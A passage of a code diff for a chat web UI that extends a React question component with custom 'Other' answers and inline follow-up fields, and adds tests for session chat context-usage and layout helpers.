+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: /确认/ })).toBeDisabled();
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).not.toHaveBeenCalled();
+  });
+
+  it('renders a custom text follow-up inside the preceding choice question', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[
+          {
+            header: '输入模式',
+            question: '告警将以哪种方式进入 stream_alert_denoise?',
+            type: 'choice',
+            options: [
+              {
+                label: 'Syslog 实时流',
+                description: '安全设备按 syslog 转发到本机。',
+              },
+              'API 批次调用',
+            ],
+          },
+          {
+            header: 'Step 1 自定义',
+            question: '如需自定义/补充说明，请输入；没有则填 none。',
+            type: 'text',
+          },
+        ]}
+        onAnswer={onAnswer}
+        compact
+      />,
+    );
+
+    expect(screen.queryByText('Step 1 自定义')).not.toBeInTheDocument();
+    expect(screen.getByText('自定义')).toBeInTheDocument();
+    expect(screen.getByRole('textbox')).toHaveAttribute('placeholder', 'none');
+
+    await user.click(screen.getByRole('button', { name: /Syslog 实时流/ }));
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['Syslog 实时流'], ['none']]);
+  });
+
+  it('renders choice options that use common non-label fields', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          header: '数据源',
+          question: '漏洞数据源用什么?',
+          type: 'choice',
+          custom: false,
+          options: [
+            { value: 'NVD', desc: 'Public CVE feed' },
+            { text: '内部扫描器' },
+            { label: '' },
+          ],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: /NVD/ })).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /内部扫描器/ })).toBeInTheDocument();
+    expect(screen.queryAllByRole('button')).toHaveLength(3);
+
+    await user.click(screen.getByRole('button', { name: /NVD/ }));
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['NVD']]);
+  });
+
+  it('uses typed text as the answer when a provided Other option is selected', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          header: '测试范围',
+          question: '「做一个测试」具体指什么?',
+          type: 'choice',
+          options: [
+            '代码单元测试',
+            {
+              label: '其他(请补充)',
+              description: '描述具体测试内容和目标',
+            },
+          ],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /其他/ }));
+
+    expect(screen.getByRole('textbox')).toBeInTheDocument();
+    expect(screen.getByRole('button', { name: /确认/ })).toBeDisabled();
+
+    await user.type(screen.getByRole('textbox'), '验证登录失败提示');
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['验证登录失败提示']]);
+  });
+
+  it('auto-appends an Other option by default and submits typed text', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          question: '选择测试范围',
+          type: 'choice',
+          options: ['代码单元测试', '环境/连通性测试'],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    await user.click(screen.getByRole('button', { name: /自定义 \/ 补充说明/ }));
+    await user.type(screen.getByRole('textbox'), '测试登录接口的 401 返回');
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['测试登录接口的 401 返回']]);
+  });
+
+  it('does not auto-append Other when custom is disabled', () => {
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          question: '选择测试范围',
+          type: 'choice',
+          custom: false,
+          options: ['代码单元测试', '环境/连通性测试'],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    expect(screen.queryByRole('button', { name: /自定义 \/ 补充说明/ })).not.toBeInTheDocument();
+  });
+
+  it('falls back to text input when a choice question has no visible options', async () => {
+    const user = userEvent.setup();
+    const onAnswer = vi.fn().mockResolvedValue(undefined);
+
+    render(
+      <QuestionTool
+        questions={[{
+          question: '漏洞数据源用什么?',
+          type: 'choice',
+          options: [{ label: '' }],
+        }]}
+        onAnswer={onAnswer}
+      />,
+    );
+
+    await user.type(screen.getByRole('textbox'), 'NVD');
+    await user.click(screen.getByRole('button', { name: /确认/ }));
+
+    expect(onAnswer).toHaveBeenCalledWith([['NVD']]);
+  });
+});
diff --git a/webui/src/components/common/QuestionTool.tsx b/webui/src/components/common/QuestionTool.tsx
index 9caec681d..0d7d5f19b 100644
--- a/webui/src/components/common/QuestionTool.tsx
+++ b/webui/src/components/common/QuestionTool.tsx
@@ -21,8 +21,9 @@ import { useTranslation } from 'react-i18next';
 export type QuestionType = 'choice' | 'text' | 'number' | 'file' | 'confirm' | 'password';
 
 export interface QuestionOption {
-  label: string;
+  label?: string;
   description?: string;
+  [key: string]: unknown;
 }
 
 export interface QuestionItem {
@@ -34,6 +35,8 @@ export interface QuestionItem {
   options?: (QuestionOption | string)[];
   /** For choice: allow selecting multiple options */
   multiple?: boolean;
+  /** For choice: allow a custom "Other" free-form answer. Defaults to true. */
+  custom?: boolean;
   /** Placeholder/hint text */
   placeholder?: string;
   /** For text: use textarea (multi-line) */
@@ -61,29 +64,106 @@ export interface QuestionToolProps {
 // ============================================================================
 
 function resolveType(q: QuestionItem): QuestionType {
+  const hasOptions = (q.options ?? []).some(opt => optionLabel(opt));
+  if (q.type === 'choice' && !hasOptions) return 'text';
   if (q.type) return q.type;
-  if (q.options && q.options.length > 0) return 'choice';
+  if (hasOptions) return 'choice';
   return 'text';
 }
 
 function optionLabel(opt: QuestionOption | string): string {
-  return typeof opt === 'string' ? opt : opt.label;
+  if (typeof opt === 'string') return opt;
+  for (const key of ['label', 'text', 'title', 'name', 'value', 'id', 'key']) {
+    const value = opt[key];
+    if (value !== undefined && value !== null) {
+      const text = String(value).trim();
+      if (text) return text;
+    }
+  }
+  return '';
 }
 
 function optionDescription(opt: QuestionOption | string): string {
-  return typeof opt === 'string' ? '' : (opt.description ?? '');
+  if (typeof opt === 'string') return '';
+  for (const key of ['description', 'desc', 'subtitle', 'detail', 'details']) {
+    const value = opt[key];
+    if (value !== undefined && value !== null) {
+      const text = String(value).trim();
+      if (text) return text;
+    }
+  }
+  return '';
+}
+
+const CUSTOM_CHOICE_PREFIX = '__flocks_custom_choice__:';
+
+function isCustomChoiceLabel(label: string): boolean {
+  return /^(其他|其它|自定义|补充)|\b(other|custom)\b|请补充|补充说明|type your answer/i.test(label.trim());
+}
+
+function customChoiceValue(text: string): string {
+  return `${CUSTOM_CHOICE_PREFIX}${text}`;
+}
+
+function isCustomChoiceValue(value: string): boolean {
+  return value.startsWith(CUSTOM_CHOICE_PREFIX);
+}
+
+function customChoiceText(answer: string[]): string {
+  const value = answer.find(isCustomChoiceValue) ?? '';
+  return value.slice(CUSTOM_CHOICE_PREFIX.length);
 }
 
-function isQuestionAnswered(q: QuestionItem, answer: string[]): boolean {
+function hasCustomChoice(answer: string[]): boolean {
+  return answer.some(isCustomChoiceValue);
+}
+
+function shouldOfferCustomChoice(q: QuestionItem): boolean {
+  return resolveType(q) === 'choice' && q.custom !== false;
+}
+
+function isQuestionAnswered(q: QuestionItem, answer: string[], allowBlankAsNone = false): boolean {
   const type = resolveType(q);
-  if (type === 'choice') return answer.length > 0;
+  if (type === 'choice') {
+    if (hasCustomChoice(answer)) return customChoiceText(answer).trim().length > 0;
+    return answer.length > 0;
+  }
   if (type === 'confirm') return answer.length > 0;
-  if (type === 'text' || type === 'password') return (answer[0] ?? '').trim().length > 0;
-  if (type === 'number') return (answer[0] ?? '').trim().length > 0;
+  if (type === 'text' || type === 'password' || type === 'number') {
+    return allowBlankAsNone || (answer[0] ?? '').trim().length > 0;
+  }
   if (type === 'file') return answer.length > 0;
   return false;
 }
 
+function normalizeAnswerForSubmit(q: QuestionItem, answer: string[], allowBlankAsNone = false): string[] {
+  const type = resolveType(q);
+  if (type === 'choice') {
+    return answer.flatMap(value => {
+      if (!isCustomChoiceValue(value)) return [value];
+      const text = value.slice(CUSTOM_CHOICE_PREFIX.length).trim();
+      return text ? [text] : [];
+    });
+  }
+  if (allowBlankAsNone && type === 'text') {
+    const value = (answer[0] ?? '').trim();
+    return [value || 'none'];
+  }
+  return answer;
+}
+
+function isInlineTextFollowUp(prev: QuestionItem | undefined, q: QuestionItem | undefined): boolean {
+  if (!q) return false;
+  if (!prev || resolveType(prev) !== 'choice' || resolveType(q) !== 'text') return false;
+  const marker = `${q.header ?? ''} ${q.question ?? ''} ${q.placeholder ?? ''}`.toLowerCase();
+  return /自定义|补充|说明|备注|其他|其它|custom|other|additional|note|comment/.test(marker);
+}
+
+function inlineTextHeader(q: QuestionItem, fallback: string): string {
+  const header = (q.header ?? '').replace(/^step\s*\d+\s*/i, '').trim();
+  return header || fallback;
+}
+
 // ============================================================================
 // Sub-components
 // ============================================================================
@@ -103,6 +183,29 @@ function ChoiceInput({
 }) {
   const { t } = useTranslation('common');
   const multiple = q.multiple ?? false;
+  const visibleOptions = (q.options ?? [])
+    .map(opt => ({
+      label: optionLabel(opt),
+      description: optionDescription(opt),
+      custom: false,
+    }))
+    .filter(opt => opt.label);
+  const hasProvidedCustomOption = visibleOptions.some(opt => isCustomChoiceLabel(opt.label));
+  const options = shouldOfferCustomChoice(q) && !hasProvidedCustomOption
+    ? [
+        ...visibleOptions,
+        {
+          label: t('question.customAnswer'),
+          description: t('question.textPlaceholder'),
+          custom: true,
+        },
+      ]
+    : visibleOptions.map(opt => ({
+        ...opt,
+        custom: isCustomChoiceLabel(opt.label),
+      }));
+  const customSelected = hasCustomChoice(answer);
+  const customText = customChoiceText(answer);
   const toggle = (label: string) => {
     if (multiple) {
       onChange(answer.includes(label) ? answer.filter(l => l !== label) : [...answer, label]);
@@ -110,6 +213,26 @@ function ChoiceInput({
       onChange([label]);
     }
   };
+  const toggleCustom = () => {
+    if (multiple) {
+      if (customSelected) {
+        onChange(answer.filter(value => !isCustomChoiceValue(value)));
+      } else {
+        onChange([...answer, customChoiceValue(customText)]);
+      }
+      return;
+    }
+    onChange(customSelected ? [] : [customChoiceValue(customText)]);
+  };
+  const setCustomText = (text: string) => {
+    const nextCustom = customChoiceValue(text);
+    if (multiple) {
+      const withoutCustom = answer.filter(value => !isCustomChoiceValue(value));
+      onChange([...withoutCustom, nextCustom]);
+      return;
+    }
+    onChange([nextCustom]);
+  };
 
   return (
     <div>
@@ -118,47 +241,59 @@ function ChoiceInput({
         {multiple ? `☑ ${t('question.multiSelect')}` : `○ ${t('question.singleSelect')}`}
       </div>
       <div className="space-y-1.5">
-        {(q.options ?? []).map(opt => {
-          const label = optionLabel(opt);
-          const desc = optionDescription(opt);
-          const selected = answer.includes(label);
+        {options.map(opt => {
+          const label = opt.label;
+          const desc = opt.description;
+          const selected = opt.custom ? customSelected : answer.includes(label);
           return (
-            <button
-              key={label}
-              onClick={() => toggle(label)}
-              disabled={disabled}
-              className={`w-full text-left rounded-lg border px-3 py-2 text-sm transition-all flex items-start gap-2.5 ${
-                selected
-                  ? 'border-purple-500 bg-purple-500 text-white shadow-sm'
-                  : 'border-gray-200 bg-white text-gray-700 hover:border-purple-300 hover:bg-purple-50'
-              }`}
-            >
-              {multiple ? (
-                <span
-                  className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded border-2 flex items-center justify-center ${
-                    selected ? 'border-white bg-white' : 'border-gray-400 bg-transparent'
-                  }`}
-                >
-                  {selected && <Check className="w-2.5 h-2.5 text-purple-500" strokeWidth={3} />}
-                </span>
-              ) : (
-                <span
-                  className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded-full border-2 flex items-center justify-center ${
-                    selected ? 'border-white' : 'border-gray-400'
-                  }`}
-                >
-                  {selected && <span className="w-2 h-2 rounded-full bg-white block" />}
-                </span>
-              )}
-              <span>
-                <span className={`font-medium ${compact ? 'text-xs' : 'text-sm'}`}>{label}</span>
-                {desc && (
-                  <span className={`block mt-0.5 ${compact ? 'text-[11px]' : 'text-xs'} ${selected ? 'text-purple-100' : 'text-gray-400'}`}>
-                    {desc}
+            <div key={label}>
+              <button
+                onClick={() => (opt.custom ? toggleCustom() : toggle(label))}
+                disabled={disabled}
+                className={`w-full text-left rounded-lg border px-3 py-2 text-sm transition-all flex items-start gap-2.5 ${
+                  selected
+                    ? 'border-purple-500 bg-purple-500 text-white shadow-sm'
+                    : 'border-gray-200 bg-white text-gray-700 hover:border-purple-300 hover:bg-purple-50'
+                }`}
+              >
+                {multiple ? (
+                  <span
+                    className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded border-2 flex items-center justify-center ${
+                      selected ? 'border-white bg-white' : 'border-gray-400 bg-transparent'
+                    }`}
+                  >
+                    {selected && <Check className="w-2.5 h-2.5 text-purple-500" strokeWidth={3} />}
+                  </span>
+                ) : (
+                  <span
+                    className={`mt-0.5 flex-shrink-0 w-4 h-4 rounded-full border-2 flex items-center justify-center ${
+                      selected ? 'border-white' : 'border-gray-400'
+                    }`}
+                  >
+                    {selected && <span className="w-2 h-2 rounded-full bg-white block" />}
                   </span>
                 )}
-              </span>
-            </button>
+                <span>
+                  <span className={`font-medium ${compact ? 'text-xs' : 'text-sm'}`}>{label}</span>
+                  {desc && (
+                    <span className={`block mt-0.5 ${compact ? 'text-[11px]' : 'text-xs'} ${selected ? 'text-purple-100' : 'text-gray-400'}`}>
+                      {desc}
+                    </span>
+                  )}
+                </span>
+              </button>
+              {opt.custom && selected && (
+                <div className="mt-1.5 rounded-lg border border-purple-100 bg-white px-3 py-2">
+                  <TextInput
+                    q={{ ...q, type: 'text', placeholder: q.placeholder || t('question.textPlaceholder'), multiline: q.multiline ?? true }}
+                    answer={[customText]}
+                    onChange={(value) => setCustomText(value[0] ?? '')}
+                    disabled={disabled}
+                    compact={compact}
+                  />
+                </div>
+              )}
+            </div>
           );
         })}
       </div>
@@ -400,11 +535,16 @@ export function QuestionTool({ questions, onAnswer, onReject, compact = false }:
     });
   };
 
-  const canSubmit = questions.every((q, i) => isQuestionAnswered(q, answers[i] ?? []));
+  const canSubmit = questions.every((q, i) => (
+    isQuestionAnswered(q, answers[i] ?? [], isInlineTextFollowUp(questions[i - 1], q))
+  ));
 
   const handleSubmit = async () => {
+    const normalizedAnswers = questions.map((q, i) => (
+      normalizeAnswerForSubmit(q, answers[i] ?? [], isInlineTextFollowUp(questions[i - 1], q))
+    ));
     setSubmitting(true);
-    try { await onAnswer(answers); } finally { setSubmitting(false); }
+    try { await onAnswer(normalizedAnswers); } finally { setSubmitting(false); }
   };
 
   const handleReject = async () => {
@@ -428,9 +568,17 @@ export function QuestionTool({ questions, onAnswer, onReject, compact = false }:
       {/* Questions */}
       <div className={`${px} ${py} space-y-5`}>
         {questions.map((q, qIdx) => {
+          if (isInlineTextFollowUp(questions[qIdx - 1], q)) return null;
+
           const type = resolveType(q);
           const answer = answers[qIdx] ?? [];
-          const inputProps = { q, answer, onChange: (v: string[]) => setAnswer(qIdx, v), disabled: submitting, compact };
+          const inlineFollowUp = type === 'choice' && isInlineTextFollowUp(q, questions[qIdx + 1])
+            ? questions[qIdx + 1]
+            : undefined;
+          const inputQuestion = inlineFollowUp && q.custom === undefined ? { ...q, custom: false } : q;
+          const inputProps = { q: inputQuestion, answer, onChange: (v: string[]) => setAnswer(qIdx, v), disabled: submitting, compact };
+          const inlineFollowUpIdx = inlineFollowUp ? qIdx + 1 : -1;
+          const inlineFollowUpAnswer = inlineFollowUp ? (answers[inlineFollowUpIdx] ?? []) : [];
 
           return (
             <div key={qIdx}>
@@ -442,6 +590,25 @@ export function QuestionTool({ questions, onAnswer, onReject, compact = false }:
               <div className={`${textSm} font-medium text-gray-800 mb-2`}>{q.question}</div>
 
               {type === 'choice'   && <ChoiceInput   {...inputProps} />}
+              {inlineFollowUp && (
+                <div className="mt-2 rounded-lg border border-purple-100 bg-white px-3 py-2.5">
+                  <div className={`${compact ? 'text-[11px]' : 'text-xs'} font-medium text-slate-700`}>
+                    {inlineTextHeader(inlineFollowUp, t('question.customAnswer'))}
+                  </div>
+                  <div className={`${compact ? 'text-[11px]' : 'text-xs'} mt-1 text-slate-500 leading-relaxed`}>
+                    {inlineFollowUp.question}
+                  </div>
+                  <div className="mt-2">
+                    <TextInput
+                      q={{ ...inlineFollowUp, placeholder: inlineFollowUp.placeholder || 'none' }}
+                      answer={inlineFollowUpAnswer}
+                      onChange={(v) => setAnswer(inlineFollowUpIdx, v)}
+                      disabled={submitting}
+                      compact={compact}
+                    />
+                  </div>
+                </div>
+              )}
               {type === 'text'     && <TextInput     {...inputProps} />}
               {type === 'number'   && <NumberInput   {...inputProps} />}
               {type === 'password' && <PasswordInput {...inputProps} />}
diff --git a/webui/src/components/common/SessionChat.test.ts b/webui/src/components/common/SessionChat.test.ts
index 0c5fe4f63..fed4b3476 100644
--- a/webui/src/components/common/SessionChat.test.ts
+++ b/webui/src/components/common/SessionChat.test.ts
@@ -1,5 +1,5 @@
 import React from 'react';
-import { render, screen, waitFor } from '@testing-library/react';
+import { act, render, screen, waitFor } from '@testing-library/react';
 import userEvent from '@testing-library/user-event';
 import { beforeEach, describe, expect, it, vi } from 'vitest';
 
@@ -7,18 +7,24 @@ import type { Message } from '@/types';
 
 import {
   areChatMessagePartsRenderEqual,
+  buildContextUsageBreakdown,
   buildTodoSummary,
   ChatToolPart,
   dedupeUploadedDocumentAttachments,
   default as SessionChat,
+  getCompactionDividerClassName,
   getEditingActionBarClassName,
   getMessageBubbleClassName,
+  getMessageErrorText,
   getMessageGroupClassName,
+  getRenderableThinkingText,
   getRenderableFileUrl,
   getRegenerateTruncateTarget,
   getStandaloneThinkingBubbleClassName,
   getUserAvatarContainerClassName,
   getUserAvatarSpacerClassName,
+  hasActiveToolPart,
+  isActiveSessionStatus,
   listUploadedDocumentPaths,
   shouldRenderMessage,
   shouldRefetchFinishedMessage,
@@ -35,14 +41,42 @@ const sessionApiRunQueuedPromptNowMock = vi.fn();
 const sessionApiUpdateMessagePartMock = vi.fn();
 const sessionApiResendMessageMock = vi.fn();
 const sessionApiRegenerateMessageMock = vi.fn();
+const sessionApiGetContextUsageMock = vi.fn();
+const sessionApiGetMock = vi.fn();
 const useSessionMessagesMock = vi.fn();
-const tMock = (key: string) => ({
+const useSSEOptionsRef = vi.hoisted(() => ({ current: null as any }));
+const tMock = (key: string, options?: Record<string, unknown>) => {
+  const value = ({
   'chat.placeholder': '请输入消息',
   'chat.emptyText': '暂无消息',
   'chat.sending': '发送中...',
   'chat.thinking': '思考中...',
   'chat.streaming': '继续输出中...',
+  'chat.process.title': '过程（{{count}} 项）',
+  'chat.process.reasoningCount': '{{count}} 段思考',
+  'chat.process.toolCount': '{{count}} 次工具调用',
   'chat.compacting': '压缩中...',
+  'chat.contextCompressed': '上下文已压缩',
+  'chat.contextUsage.title': 'Context Usage',
+  'chat.contextUsage.close': 'Close',
+  'chat.contextUsage.full': '13% Full',
+  'chat.contextUsage.tokens': '~13 / 100 Tokens',
+  'chat.contextUsage.excludedTokens': '100 excluded',
+  'chat.contextUsage.noAttributedSegments': 'No attributed breakdown',
+  'chat.contextUsage.breakdown.systemPrompt': 'System prompt',
+  'chat.contextUsage.breakdown.toolDefinitions': 'Tool definitions',
+  'chat.contextUsage.breakdown.tools': 'Tool calls',
+  'chat.contextUsage.breakdown.skillLoad': 'Skill loads',
+  'chat.contextUsage.breakdown.agentDelegation': 'Agent delegation',
+  'chat.contextUsage.breakdown.conversation': 'Conversation',
+  'chat.contextUsage.breakdown.reasoning': 'Reasoning',
+  'chat.contextUsage.breakdown.draft': 'Current draft',
+  'chat.contextUsage.breakdown.compactedHistory': 'Compacted history',
+  'chat.goal.dismiss': 'Dismiss goal notice',
+  'chat.goal.status.active': 'Goal',
+  'chat.goal.status.completed': 'Completed',
+  'chat.goal.status.blocked': 'Blocked',
+  'chat.goal.status.paused': 'Paused',
   'chat.mention.title': '选择 Agent',
   'chat.mention.navigate': '导航',
   'chat.mention.select': '选择',
@@ -53,8 +87,18 @@ const tMock = (key: string) => ({
   'chat.tool.inputParams': '输入参数',
   'chat.tool.outputResult': '输出结果',
   'chat.tool.todoStages': 'Todo 阶段',
+  'chat.tool.todoStatus.pending': '待办',
+  'chat.tool.todoStatus.inProgress': '进行中',
+  'chat.tool.todoStatus.completed': '完成',
+  'chat.tool.todoStatus.cancelled': '已取消',
+  'chat.tool.todoSummary.progress': '进度',
+  'chat.tool.todoSummary.inProgress': '进行中',
+  'chat.tool.todoSummary.completed': '完成',
+  'chat.tool.todoSummary.done': '完成',
   'smartAssistant': '智能助手',
-}[key] ?? key);
+  }[key] ?? key);
+  return value.replace(/\{\{(\w+)\}\}/g, (_, name) => String(options?.[name] ?? ''));
+};
 const pendingQuestionsHookMock = {
   pendingQuestions: {},
   handleQuestionAsked: vi.fn(),
@@ -82,7 +126,10 @@ vi.mock('@/hooks/useSessions', () => ({
 }));
 
 vi.mock('@/hooks/useSSE', () => ({
-  useSSE: () => ({ status: 'connected' }),
+  useSSE: (options: any) => {
+    useSSEOptionsRef.current = options;
+    return { status: 'connected' };
+  },
 }));
 
 vi.mock('@/hooks/useReasoningToggle', () => ({
@@ -112,6 +159,7 @@ vi.mock('@/api/client', () => ({
 
 vi.mock('@/api/session', () => ({
   sessionApi: {
+    get: (...args: unknown[]) => sessionApiGetMock(...args),
     listPromptQueue: (...args: unknown[]) => sessionApiListPromptQueueMock(...args),
     enqueuePrompt: (...args: unknown[]) => sessionApiEnqueuePromptMock(...args),
     updateQueuedPrompt: (...args: unknown[]) => sessionApiUpdateQueuedPromptMock(...args),
@@ -120,22 +168,26 @@ vi.mock('@/api/session', () => ({
     updateMessagePart: (...args: unknown[]) => sessionApiUpdateMessagePartMock(...args),
     resendMessage: (...args: unknown[]) => sessionApiResendMessageMock(...args),
     regenerateMessage: (...args: unknown[]) => sessionApiRegenerateMessageMock(...args),
+    getContextUsage: (...args: unknown[]) => sessionApiGetContextUsageMock(...args),
   },
 }));
 
 beforeEach(() => {
   vi.clearAllMocks();
-  if (typeof window.localStorage?.clear !== 'function') {
-    Object.defineProperty(window, 'localStorage', {
-      configurable: true,
-      value: {
-        clear: vi.fn(),
-        getItem: vi.fn(),
-        setItem: vi.fn(),
-        removeItem: vi.fn(),
-      },
-    });
-  }
+  const localStorageData = new Map<string, string>();
+  Object.defineProperty(window, 'localStorage', {
+    configurable: true,
+    value: {
+      clear: vi.fn(() => localStorageData.clear()),
+      getItem: vi.fn((key: string) => localStorageData.get(key) ?? null),
+      setItem: vi.fn((key: string, value: string) => {
+        localStorageData.set(key, String(value));
+      }),
+      removeItem: vi.fn((key: string) => {
+        localStorageData.delete(key);
+      }),
+    },
+  });
   window.localStorage.clear();
   Object.defineProperty(window.HTMLElement.prototype, 'scrollIntoView', {
     configurable: true,
@@ -151,7 +203,20 @@ beforeEach(() => {
   sessionApiUpdateMessagePartMock.mockResolvedValue({});
   sessionApiResendMessageMock.mockResolvedValue({});
   sessionApiRegenerateMessageMock.mockResolvedValue({});
+  sessionApiGetMock.mockResolvedValue({});
+  sessionApiGetContextUsageMock.mockResolvedValue({
+    sessionID: 'sess-1',
+    usedTokens: 0,
+    contextWindow: 0,
+    percent: 0,
+    source: 'estimated',
+    estimatedTokens: 0,
+    compactedTokens: 0,
+    segments: [],
+    excludedSegments: [],
+  });
   pendingQuestionsHookMock.fetchPendingQuestions.mockResolvedValue(undefined);
+  useSSEOptionsRef.current = null;
   useSessionMessagesMock.mockReturnValue({
     messages: [],
     loading: false,
@@ -200,13 +265,101 @@ describe('listUploadedDocumentPaths', () => {
   });
 });
 
+describe('buildContextUsageBreakdown', () => {
+  it('excludes compacted history from the current used-token total', () => {
+    const breakdown = buildContextUsageBreakdown([
+      makeMessage({
+        id: 'active',
+        role: 'user',
+        parts: [{ id: 'active-text', type: 'text', text: 'a'.repeat(400) }],
+      }),
+      makeMessage({
+        id: 'archived',
+        compacted: true,
+        parts: [{ id: 'archived-text', type: 'text', text: 'b'.repeat(800) }],
+      }),
+    ], 'c'.repeat(40));
+
+    expect(breakdown.usedTokens).toBe(110);
+    expect(breakdown.compactedTokens).toBe(200);
+    expect(breakdown.segments.map((segment) => [segment.key, segment.tokens])).toEqual([
+      ['systemPrompt', 0],
+      ['toolDefinitions', 0],
+      ['conversation', 110],
+      ['reasoning', 0],
+      ['tools', 0],
+      ['skillLoad', 0],
+      ['agentDelegation', 0],
+    ]);
+    expect(breakdown.excludedSegments).toEqual([]);
+  });
+
+  it('counts compacted tool outputs as a small placeholder', () => {
+    const compactedTime = { start: 1, compacted: 2 };
+    const breakdown = buildContextUsageBreakdown([
+      makeMessage({
+        id: 'tool-msg',
+        parts: [{
+          id: 'tool-part',
+          type: 'tool',
+          tool: 'bash',
+          state: {
+            status: 'completed',
+            input: { command: 'x'.repeat(40) },
+            output: 'y'.repeat(800),
+            time: compactedTime,
+          },
+        }],
+      }),
+    ], '');
+
+    expect(breakdown.usedTokens).toBe(23);
+  });
+
+  it('uses backend snapshots when available and adds the local draft on top', () => {
+    const breakdown = buildContextUsageBreakdown([], 'd'.repeat(40), {
+      sessionID: 'sess-1',
+      usedTokens: 130,
+      contextWindow: 1000,
+      percent: 13,
+      source: 'observed',
+      lastMessageID: 'assistant-1',
+      observedTokens: 130,
+      estimatedTokens: 100,
+      compactedTokens: 50,
+      segments: [
+        { key: 'systemPrompt', tokens: 15, included: true, source: 'estimated' },
+        { key: 'toolDefinitions', tokens: 10, included: true, source: 'estimated' },
+        { key: 'tools', tokens: 40, included: true, source: 'estimated' },
+        { key: 'skillLoad', tokens: 20, included: true, source: 'estimated' },
+        { key: 'agentDelegation', tokens: 10, included: true, source: 'estimated' },
+        { key: 'conversation', tokens: 30, included: true, source: 'estimated' },
+        { key: 'reasoning', tokens: 5, included: true, source: 'observed' },
+      ],
+      excludedSegments: [
+        { key: 'compactedHistory', tokens: 50, included: false, source: 'estimated' },
+      ],
+    });
+
+    expect(breakdown.usedTokens).toBe(140);
+    expect(breakdown.compactedTokens).toBe(50);
+    expect(breakdown.segments.map((segment) => [segment.key, segment.tokens])).toEqual([
+      ['systemPrompt', 15],
+      ['toolDefinitions', 10],
+      ['conversation', 40],
+      ['reasoning', 5],
+      ['tools', 40],
+      ['skillLoad', 20],
+      ['agentDelegation', 10],
+    ]);
+    expect(breakdown.excludedSegments).toEqual([]);
+  });
+});
+
 describe('getMessageBubbleClassName', () => {
-  // The bubble's max width is owned by its outer container (`max-w-[80%]` for
-  // user, `w-full` for assistant; see SessionChat.tsx), so the inner bubble
-  // only controls its own intrinsic sizing (`w-auto` vs `w-full`).  Previously
-  // the inner bubble also pinned `max-w-2xl`, but the unified chat redesign
-  // moved that responsibility outward.  Tests here therefore assert width
-  // semantics, not the legacy `max-w-2xl` literal.
+  // The message column owns the available width, so the inner bubble only
+  // controls intrinsic sizing (`w-auto` vs `w-full`). Tests here therefore
+  // assert width semantics, not legacy max-width literals.
   it('keeps non-editing user bubbles auto-sized in full layout', () => {
     const className = getMessageBubbleClassName({
       compact: false,
@@ -238,29 +391,51 @@ describe('getMessageBubbleClassName', () => {
 
     expect(className).toContain('w-full');
   });
+
+  it('fills the fixed compact assistant message column', () => {
+    const className = getMessageBubbleClassName({
+      compact: true,
+      isUser: false,
+      isEditing: false,
+    });
+
+    expect(className).toContain('w-full');
+    expect(className).toContain('max-w-full');
+  });
+
+  it('keeps compact user bubbles content-sized when not editing', () => {
+    const className = getMessageBubbleClassName({
+      compact: true,
+      isUser: true,
+      isEditing: false,
+    });
+
+    expect(className).toContain('max-w-full');
+    expect(className.split(/\s+/)).not.toContain('w-full');
+  });
 });
 
 describe('getMessageGroupClassName', () => {
-  it('caps full-layout user messages at 80% width', () => {
+  it('caps full-layout user messages at 88% width', () => {
     const className = getMessageGroupClassName({
       compact: false,
       isUser: true,
       isEditing: false,
     });
 
-    expect(className).toContain('max-w-[80%]');
+    expect(className).toContain('max-w-[88%]');
     expect(className).toContain('w-fit');
   });
 
-  it('expands editing user messages to the 80% container width', () => {
+  it('expands editing user messages to the full content width', () => {
     const className = getMessageGroupClassName({
       compact: false,
       isUser: true,
       isEditing: true,
     });
 
-    expect(className).toContain('w-[80%]');
-    expect(className).toContain('max-w-[80%]');
+    expect(className).toContain('w-full');
+    expect(className).toContain('max-w-full');
   });
 
   it('keeps assistant messages full width in full layout', () => {
@@ -272,6 +447,30 @@ describe('getMessageGroupClassName', () => {
 
     expect(className).toBe('w-full');
   });
+
+  it('uses the full compact message-list width for assistant messages', () => {
+    const className = getMessageGroupClassName({
+      compact: true,
+      isUser: false,
+      isEditing: false,
+    });
+
+    expect(className).toBe('w-full max-w-full');
+  });
+});
+
+describe('getCompactionDividerClassName', () => {
+  it('insets the divider into the assistant content column in full layout', () => {
+    const className = getCompactionDividerClassName(false);
+
+    expect(className).toContain('pl-[42px]');
+    expect(className).toContain('w-full');
+    expect(className).toContain('min-w-0');
+  });
+
+  it('uses the compact assistant inset in compact layout', () => {
+    expect(getCompactionDividerClassName(true)).toContain('pl-[38px]');
+  });
 });
 
 describe('getEditingActionBarClassName', () => {
@@ -305,6 +504,18 @@ describe('getRenderableFileUrl', () => {
     );
   });
 
+  it('converts Windows file URLs without adding a POSIX root prefix', () => {
+    expect(getRenderableFileUrl('file:///C:/Users/demo/Pictures/channel%20image.png')).toBe(
+      '/api/file/download?path=C%3A%2FUsers%2Fdemo%2FPictures%2Fchannel%20image.png',
+    );
+  });
+
